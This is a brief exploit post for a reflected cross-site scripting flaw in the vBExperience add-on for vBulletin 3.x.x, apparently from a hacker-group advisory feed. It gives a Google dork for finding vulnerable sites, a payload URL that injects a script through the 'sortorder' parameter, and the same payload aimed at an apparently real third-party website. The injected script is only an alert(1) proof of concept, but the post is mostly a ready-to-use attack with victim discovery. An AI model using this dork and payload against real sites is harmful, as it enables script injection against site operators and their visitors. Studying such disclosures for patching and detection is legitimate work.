vBulletin version 3.x.x with the vBExperience add-on suffers from a cross site scripting vulnerability.
e924dae1d3bbb435c119d685e197c46a03bae17d96c4120bcd85abab9559991f
[~] Author : Mr.ThieF <~
[~] Contact : Mr.ThieF@yahoo.com <~
[~] DorK : inurl:xperience.php
[~] Software Link : http://www.vbulletin.org/forum/showthread.php?t=171014
[~] Version : 3.x.x
[~] Exploit :
http://[site]/[path]/xperience.php?sortfield=xr&sortorder="><s cript>alert(1);</s cript>
Example : http://www.worldwide-invest.org/xperience.php?sortfield=xr&sortorder="><s cript>alert(1);</s cript>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
GreeTz : RENO <3 - x-CoD3r <3 - T3rr0risT_07 <3 -Snip3r_www - ALL My FrindS <3